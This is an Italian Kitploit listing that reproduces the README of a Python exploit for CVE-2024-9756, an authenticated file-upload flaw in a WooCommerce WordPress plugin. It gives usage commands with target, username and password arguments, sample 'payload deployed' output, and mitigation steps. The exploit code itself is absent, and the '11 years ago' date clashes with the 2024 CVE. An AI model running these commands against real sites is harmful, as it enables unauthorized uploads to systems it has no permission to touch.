Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-9756 — Order Attachments for WooCommerce 2.0 - 2.4.1 - Mancata Autorizzazione per Autenticato (Abbonato+) Caricamento Arbitrario Limitato di File | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-9756
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2024-9756

CVE-2024-9756

Order Attachments for WooCommerce 2.0 - 2.4.1 - Mancata Autorizzazione per Autenticato (Abbonato+) Caricamento Arbitrario Limitato di File

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚀 Exploit di Caricamento Arbitrario di File WooCommerce (CVE-2024-9756)

📌 Panoramica

Questo exploit sfrutta una vulnerabilità di caricamento arbitrario limitato e non autorizzato nel plugin Order Attachments for WooCommerce (versioni 2.0 - 2.4.1) per WordPress.
La vulnerabilità consente a utenti autenticati (Subscriber+) di caricare tipi di file limitati senza la dovuta autorizzazione.

⚠️ Disclaimer

Questo script è solo a scopo educativo e di ricerca sulla sicurezza. Qualsiasi uso non autorizzato di questo exploit su sistemi di cui non si è proprietari è strettamente illegale.


🔗 Dettagli CVE

  • CVE ID: CVE-2024-9756
  • Plugin Vulnerabile: Order Attachments for WooCommerce
  • Versioni Affette: da 2.0 a 2.4.1
  • Tipo di Vulnerabilità: Autorizzazione Mancante per Caricamento Arbitrario di File Autenticato
  • Prerequisito di Sfruttamento: Accesso WordPress valido con almeno ruolo "Subscriber"
  • Impatto Potenziale: Caricamenti di file limitati che possono essere usati per ulteriore sfruttamento.

⚙️ Requisiti

Assicurati di avere quanto segue prima di eseguire l'exploit:

✅ Dipendenze

  • Python 3.x
  • Modulo requests → Installa con:
    root@kitploit:~
    pip install requests
    
  • Sito WordPress di destinazione con il plugin vulnerabile installato.

✅ Permessi Utente WordPress

  • Richiede accesso Subscriber+ per sfruttare.

🚀 Utilizzo dell'Exploit

🔹 Esecuzione dell'Exploit

root@kitploit:~
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>

Esempio:

root@kitploit:~
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword

🔧 Utilizzo Avanzato

Puoi specificare nomi di file personalizzati e ID ordine:

🔹 Caricare un file specifico

root@kitploit:~
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"

🔹 Allegare file a un ID Ordine diverso

root@kitploit:~
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200

📌 Comportamento dello Script

  1. Autentica con WordPress usando le credenziali fornite.
  2. Verifica che il file esista localmente prima del caricamento.
  3. Esegue l'exploit di caricamento file tramite l'endpoint AJAX vulnerabile.
  4. Analizza la risposta del server ed estrae l'URL del file caricato.

✅ Output Atteso

In caso di successo, lo script restituirà l'URL del file caricato:

root@kitploit:~
[*] Initiating authentication...
[✔] Authentication successful.
[*] Deploying payload: Nxploit.jpg to order 196...
[✔] Payload successfully deployed!
🔗 File URL: http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg

🔥 Mitigazione e Correzioni

  • Aggiorna il plugin all'ultima versione corretta.
  • Limita le autorizzazioni di caricamento file ai soli Amministratori.
  • Modifica functions.php per bloccare wp_ajax_wcoa_add_attachment da utenti non autorizzati:
    root@kitploit:~
    if (!current_user_can('manage_woocommerce')) {
        wp_send_json_error(['message' => 'Unauthorized'], 403);
        exit;
    }
    

🛑 Avviso Legale

Questo exploit è pubblicato solo a scopo educativo e di ricerca sulla sicurezza.
L'uso non autorizzato contro sistemi senza esplicito permesso è illegale e punibile secondo le leggi sulla sicurezza informatica.
Usalo a tuo rischio e pericolo.


Scarica lo strumento